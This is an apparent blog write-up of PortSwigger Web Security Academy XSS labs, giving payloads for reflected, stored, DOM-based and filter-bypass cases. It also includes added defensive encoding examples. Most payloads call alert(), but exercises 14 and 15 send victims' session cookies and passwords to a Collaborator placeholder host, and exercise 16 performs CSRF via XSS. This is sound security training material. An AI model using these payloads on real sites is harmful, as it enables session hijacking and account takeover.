PortSwigger lab XSS attack exercises

Exercise 1: Reflected XSS with nothing encoded

Lab

html-context-nothing-encoded

Description

This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.

To solve the lab, perform a cross-site scripting attack that calls the alert function.

Solution

Construct the simplest XSS payload directly

<script>alert%28%29<%2Fscript>

Exercise 2: Stored XSS with nothing encoded

Lab

html-context-nothing-encoded

Description

This lab contains a stored cross-site scripting vulnerability in the comment functionality.

To solve this lab, submit a comment that calls the alert function when the blog post is viewed.

Solution

Insert the simplest XSS payload in a blog comment; the stored XSS fires when the article page is viewed

<script>alert()</script>

Exercise 3: DOM XSS that takes a parameter from the URL and writes it into the DOM

DOM XSS that reads the parameter with location.search and rebuilds the DOM with document.write

Lab

document-write-sink

Description

This lab contains a DOM-based cross-site scripting vulnerability in the search query tracking functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search, which you can control using the website URL.

To solve this lab, perform a cross-site scripting attack that calls the alert function.

Solution

The search text entered by the user is concatenated in the JS code into the src attribute of an img tag that is inserted as a DOM node. Use " to close the src attribute, use > to close the img tag, then insert the XSS code

search="><script>alert()</script>

Exercise 4: DOM XSS that takes a parameter from the URL and writes it into innerHTML

Lab

innerhtml-sink

Description

This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an innerHTML assignment, which changes the HTML contents of a div element, using data from location.search.

To solve this lab, perform a cross-site scripting attack that calls the alert function.

Solution

When innerHTML is modified, a script tag inserted directly does not execute automatically, so use the onerror event of an img tag to run the XSS code automatically

<img src=2 onerror=alert()>

Exercise 5: DOM XSS that modifies an element attribute through a jQuery selector

Lab

jquery-href-attribute-sink

Description

This lab contains a DOM-based cross-site scripting vulnerability in the submit feedback page. It uses the jQuery library's $ selector function to find an anchor element, and changes its href attribute using data from location.search.

To solve this lab, make the "back" link alert document.cookie.

Solution

On the Submit feedback page, the back button is an a tag whose href attribute is filled in by JS from the returnPath parameter of the URL. Modify the URL so that the XSS code runs automatically

?returnPath=javascript:alert()

Exercise 6: DOM XSS in a jQuery selector sink using a hashchange event

Lab

jquery-selector-hash-change-event

Description

This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery's $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.

To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.

Solution

I did not fully understand this one. Reading the JS source: when the page's hash value changes, an attribute value taken from the page data is used as the jQuery selector, and once the element is found the page scrolls to it. Modifying the body on the server and sending the packet to the client can change the page's hash value, triggering the XSS that calls the print() function

(Official solution) Modify the body on the server

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

Exercise 7: Reflected XSS with angle brackets encoded

Lab

attribute-angle-brackets-html-encoded

Description

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function.

Solution

Angle brackets are encoded here. Looking at the page, the text entered in the search box becomes the value attribute of an input tag. Use a double quote to close the value attribute, add a mouseover event handler that runs the XSS code, and close the trailing double quote to avoid a syntax error

" onmouseover=alert() a="

Exercise 8: Stored XSS in an href attribute with double quotes encoded

Lab

href-attribute-double-quotes-html-encoded

Description

This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.

Solution

The website entered in a blog comment becomes the value of an a tag's href attribute

Website:

javascript:alert()

Exercise 9: Reflected XSS in a JS string with angle brackets encoded

Lab

javascript-string-angle-brackets-html-encoded

Description

This lab contains a [reflected cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/reflected) vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the `alert` function.

Solution

Look at the page's JS code; use ' to close the string and construct a new JS statement

';alert();'

Exercise 10: DOM XSS inside a select element

Lab

document-write-sink-inside-select-element

Description

This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search which you can control using the website URL. The data is enclosed within a select element.

To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the alert function.

Solution

Looking at the JS code, the storeId parameter from the URL is added to the DOM; construct the XSS code accordingly

storeId=<script>alert()</script>

Exercise 11: DOM XSS in AngularJS with angle brackets and double quotes HTML-encoded

Lab

angularjs-expression

Description

This lab contains a [DOM-based cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/dom-based) vulnerability in a [AngularJS](https://portswigger.net/web-security/cross-site-scripting/contexts/angularjs-sandbox) expression within the search functionality.

AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the `ng-app` attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces. This technique is useful when angle brackets are being encoded.

To solve this lab, perform a [cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) attack that executes an AngularJS expression and calls the `alert` function.

Solution

AngularJS evaluates JS expressions inside double curly braces; the payload reaches a constructor through the constructor property

{{$on.constructor('alert(1)')()}}

Exercise 12: Reflected DOM XSS

Lab

dom-xss-reflected

Description

This lab demonstrates a reflected DOM vulnerability. Reflected DOM vulnerabilities occur when the server-side application processes data from a request and echoes the data in the response. A script on the page then processes the reflected data in an unsafe way, ultimately writing it to a dangerous sink.

To solve this lab, create an injection that calls the alert() function.

Solution

First submit a search from the search box and look at the page source: in searchResults.js an anonymous function runs when the server's response arrives

That function calls eval('var searchResultsObj = ' + this.responseText), concatenating the response data into a string and executing it

Looking at the JSON the page returns, double quotes are escaped but the backslash \ is not, so placing \ before a double quote lets the quote escape; appending }// after alert ends the JSON data early

\"-alert(1)}//

Exercise 13: Stored DOM XSS

Lab

dom-xss-stored

Description

This lab demonstrates a stored DOM vulnerability in the blog comment functionality. To solve this lab, exploit this vulnerability to call the alert() function.

Solution

The JS source shows that .replace() is used to replace angle brackets with the empty string, but it only replaces the first < and the first >, so inserting a pair of <> before the XSS code lets the XSS code through

<><img src=2 onerror=alert(1)>
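
The defensive side of exercises 7 and 13, as an added example that is not code from the original post or from PortSwigger: an encoder that neutralises every HTML-significant character for all occurrences, shown beside the angle-bracket-only encoder of exercise 7 and the first-match .replace() sanitiser of exercise 13. The function names and the input-element template are assumptions that approximate the labs' markup.

```javascript
// Added example; not code from the original post or from PortSwigger.
// Neutralising only angle brackets is not enough: in a quoted attribute value a
// double quote ends the attribute (exercise 7), and String.prototype.replace with
// a string pattern rewrites only the first match (exercise 13).

// Sanitiser of the kind exercise 13 describes: removes the first "<" and the first ">" only.
function stripFirstAngleBrackets(s) {
  return s.replace("<", "").replace(">", "");
}

// Encoder that only neutralises angle brackets, as exercise 7 describes.
function encodeAngleBracketsOnly(s) {
  return s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Encoder for HTML text and quoted attribute values: every character that can
// change the parser's state in either context is replaced, for all occurrences.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Assumed approximation of the lab's search form; `encoder` is whatever the
// application applies before inserting the user's value.
const INPUT_PREFIX = '<input type="text" name="search" value="';
function renderSearchInput(encoder, value) {
  return INPUT_PREFIX + encoder(value) + '">';
}

// True when the encoded value could not have closed the attribute or opened a
// tag: nothing between the template's own quotes is a raw quote or angle bracket.
function valueStaysInsideAttribute(markup) {
  const inner = markup.slice(INPUT_PREFIX.length, -2);
  return !/["<>]/.test(inner);
}
```

In the DOM-based exercises above the same outcome is reached without an encoder by assigning textContent or calling setAttribute instead of using document.write or innerHTML.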

Exercise 14: Stealing cookies with XSS

Lab

stealing-cookies

Description

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's session cookie, then use this cookie to impersonate the victim.

Note

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

Some users will notice that there is an alternative solution to this lab that does not require Burp Collaborator. However, it is far less subtle than exfiltrating the cookie.

Solution

Submit the payload in a blog comment

Open the Burp Collaborator client, copy the Collaborator payload, and use it to replace BURP-COLLABORATOR-SUBDOMAIN

<script> new Image().src="http://BURP-COLLABORATOR-SUBDOMAIN?Cooike="+encodeURI(document.cookie); </script> 

Once secret=xxx;session=xxx is received, tamper with the Cookie field of the HTTP request header; success.

Exercise 15: Capturing passwords with XSS

Lab

capturing-passwords

Description

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's username and password then use these credentials to log in to the victim's account.

Note

Same as exercise 14: to prevent this lab from being used to attack other sites, the lab server's firewall blocks access to the outside. To complete the lab you must therefore use Burp Collaborator's public server.

Solution

Official solution (this one had me completely stumped; I could not work it out no matter how hard I thought)

Open the Burp Collaborator client, copy the Collaborator payload, and use it to replace BURP-COLLABORATOR-SUBDOMAIN

Submit this code in a blog comment

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+'-'+this.value
});">

The credentials administrator-xxx are received

Exercise 16: Performing CSRF through XSS

Lab

perform-csrf

Description

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.

You can log in to your own account using the following credentials: wiener:peter

Solution

Log in with your own account wiener:peter, submit an email-change request and inspect the request packet; the request URL is /my-account/change-email

When another user opens the blog post, the XSS sends a GET request for the my-account page, extracts the csrf value with a regular expression, and then uses that csrf token to send a request to /my-account/change-email that changes that user's email

<script>
var req = new XMLHttpRequest();
req.onload = function(){
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=hacker@hack.com')
};
req.open('get','/my-account',true);
req.send();
</script>

Exercise 17: Reflected XSS with most HTML tags and attributes blocked

Lab

html-context-with-most-tags-and-attributes-blocked

Description

This lab contains a reflected XSS vulnerability in the search functionality but uses a web application firewall (WAF) to protect against common XSS vectors.

To solve the lab, perform a cross-site scripting attack that bypasses the WAF and calls the print() function.

Note

Your solution must not require any user interaction. Manually causing print() to be called in your own browser will not solve the lab.

Solution

body and onresize are not blocked, but the window has to be resized manually for the event to fire

<body onresize=print()>

Use an iframe with an onload attribute to trigger the onresize event automatically

<iframe src="https://acb41f441e21c43ac013531500d400bb.net/?search="><body onresize=print()>" onload=this.style.width='100px'>

Go back to the exploit server, save the following payload and deliver it to the victim

<iframe src="https://你的靶场ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

Exercise 18: Reflected XSS with all HTML tags blocked except custom ones

Lab

html-context-with-all-standard-tags-blocked

Description

This lab blocks all HTML tags except custom ones.

To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.

Solution

A custom tag can carry an id attribute, and #id in the URL scrolls the page to the element with that id.

The tabindex attribute: when the visitor moves through the page's controls with the TAB key, focus goes first to the control with the smallest tabindex value and ends on the control with the largest. The default tabindex is 0, which sorts after all controls with an explicit tabindex. Setting tabindex to a value from 1 to 32767 adds the control to the TAB key sequence.

Setting the custom tag's tabindex attribute to 1 lets the element receive focus automatically (firing the onfocus event)

Go to the exploit server and enter the following code in the body

<script> location="https://你的靶场ID.web-security-academy.net/?search=<xss%20id=xss%20onfocus=alert(document.cookie)%20tabindex=1>#xss" </script>

Exercise 19: Reflected XSS with some SVG markup allowed

Lab

some-svg-markup-allowed

Description

This lab has a simple reflected XSS vulnerability. The site is blocking common tags but misses some SVG tags and events.

To solve the lab, perform a cross-site scripting attack that calls the alert() function.

Solution

Brute-forcing tags and attributes with Burp Suite's Intruder shows that the svg tag, the animatetransform tag (which animates a transform attribute on the target element) and the onbegin event (fired when the animation starts) are not blocked

<svg><animatetransform onbegin=alert(1)>

Exercise 20: Reflected XSS in a canonical link tag

Lab

canonical-link-tag

Description

This lab reflects user input in a canonical link tag and escapes angle brackets.

To solve the lab, perform a cross-site scripting attack on the home page that injects an attribute that calls the alert function.

To assist with your exploit, you can assume that the simulated user will press the following key combinations:

ALT+SHIFT+X
CTRL+ALT+X
Alt+X

Please note that the intended solution to this lab is only possible in Chrome.

Solution

The accesskey attribute defines a keyboard shortcut that activates the element. The lab assumes the user will press the x shortcut. Use ' to close the link tag's attribute value

?'accesskey='x'onclick='alert()'

Exercise 21: Reflected XSS in a JS string with single quotes and backslashes escaped

Lab

javascript-string-single-quote-backslash-escaped

Description

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality. The reflection occurs inside a JavaScript string with single quotes and backslashes escaped.

To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Solution

Although the JS embedded in the HTML escapes single quotes and backslashes, the script tag itself can be closed directly, sidestepping the JS-level escaping entirely

</script><script>alert(1)</script>

Exercise 22: Reflected XSS in a JS string with single quotes escaped and angle brackets and double quotes HTML-encoded

Lab

javascript-string-angle-brackets-double-quotes-encoded-single-quotes-escaped

Description

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets and double quotes are HTML encoded and single quotes are escaped.

To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Solution

The backslash is not escaped, so a backslash can be used to escape the backslash that the application adds to escape the user's single quote. The single quote then survives and closes the JS string. Add a // comment after alert to keep the JS from raising an error

\';alert();//

Exercise 23: Stored XSS in an onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslashes escaped

Lab

onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped

Description

This lab contains a stored cross-site scripting vulnerability in the comment functionality.

To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.

Solution

Submitting a comment shows that the entered website is placed inside an onclick event handler as a single-quoted string

Construct the payload: http is there to pass the URL check; HTML entity encoding bypasses the single-quote escaping; a closing parenthesis and semicolon terminate the preceding statement; after the XSS code, another entity-encoded quote closes the original trailing single quote to avoid a syntax error

http://&apos;);alert(&apos;

Exercise 24: Reflected XSS in a template literal with ` < > ' " Unicode-escaped

Lab

javascript-template-literal-angle-brackets-single-double-quotes-backslash-backticks-escaped

Description

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality. The reflection occurs inside a template string with angle brackets, single, and double quotes HTML encoded, and backticks escaped. To solve this lab, perform a cross-site scripting attack that calls the alert function inside the template string.

Solution

What this really tests is the ES6 template literal syntax:

var s = 'string1';
`string2${s}` // -> 'string2string1'

A variable can be interpolated into the string to perform concatenation.

Enter the following in the search box; it joins with the backticks already in the page's JS to form a template literal, and the code inside the placeholder is executed

${alert()}
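
The defensive side of exercises 12, 22 and 24, as an added example that is not code from the original post or from PortSwigger: an escaper for the JavaScript string context that handles the backslash before any quote, shown beside the quote-only escaper the labs describe, a check that the produced literal still closes where the template intended, and JSON.stringify/JSON.parse in place of string concatenation and eval. The function names and the var searchTerms = '...' template are assumptions.

```javascript
// Added example; not code from the original post or from PortSwigger.
// Input placed inside a JavaScript string literal must be escaped for that
// context, and the backslash must be escaped first: otherwise an input backslash
// cancels the escape the application adds for a quote (exercises 12 and 22).

// Partial escaper of the kind the labs describe: quotes escaped, backslashes not.
function escapeQuotesOnly(s) {
  return s.replace(/'/g, "\\'");
}

// Hardened escaper for quoted strings and template literals. The backslash rule
// runs before every rule that emits a backslash. "${" is escaped so it cannot
// open a template placeholder (exercise 24), "<" becomes \x3c so the string can
// never contain "</script>", and line terminators would otherwise end the statement.
function escapeJsString(s) {
  return s
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/"/g, '\\"')
    .replace(/`/g, "\\`")
    .replace(/\$\{/g, "\\${")
    .replace(/</g, "\\x3c")
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Builds the inline script the way the search-tracking page does (assumed template).
function buildScript(escaper, input) {
  return "var searchTerms = '" + escaper(input) + "';";
}

// True only if the first unescaped quote after the opening one is the template's
// own closing quote (second-to-last character, before the ";").
function literalStaysClosed(src) {
  for (let i = src.indexOf("'") + 1; i < src.length; i++) {
    if (src[i] === "\\") { i++; continue; }
    if (src[i] === "'") return i === src.length - 2;
  }
  return false;
}

// Exercise 12 fix: produce the response with JSON.stringify, which escapes both
// \ and ", and consume it with JSON.parse rather than eval.
function serialiseSearch(term, results) {
  return JSON.stringify({ searchTerm: term, results: results });
}
function parseSearch(body) {
  return JSON.parse(body);
}
```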

Exercise 25: Reflected XSS with event handlers and href attributes blocked

Lab

event-handlers-and-href-attributes-blocked

Description

This lab contains a reflected XSS vulnerability with some whitelisted tags, but all events and anchor href attributes are blocked.

To solve the lab, perform a cross-site scripting attack that injects a vector that, when clicked, calls the alert function.

Note that you need to label your vector with the word "Click" in order to induce the simulated lab user to click your vector. For example:

<a href="">Click me</a>

Solution

<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>

Exercise 26: Reflected XSS in a JavaScript URL with some characters blocked

Lab

javascript-url-some-characters-blocked

Description

This lab reflects your input in a JavaScript URL, but all is not as it seems. This initially seems like a trivial challenge; however, the application is blocking some characters in an attempt to prevent XSS attacks.

To solve the lab, perform a cross-site scripting attack that calls the alert function with the string 1337 contained somewhere in the alert message.

Solution

Official solution

post?postId=5&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

Roughly what the HTML looks like after concatenation

<a href="javascript:fetch('/analytics', {method:'post',body:'/post?postId=1&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:''}).finally(_ => window.location = '/')">Back to Blog</a>

Exercises 27 to 30

These involve the AngularJS framework and CSP security policy; not done for now

Posted by SD_ZYL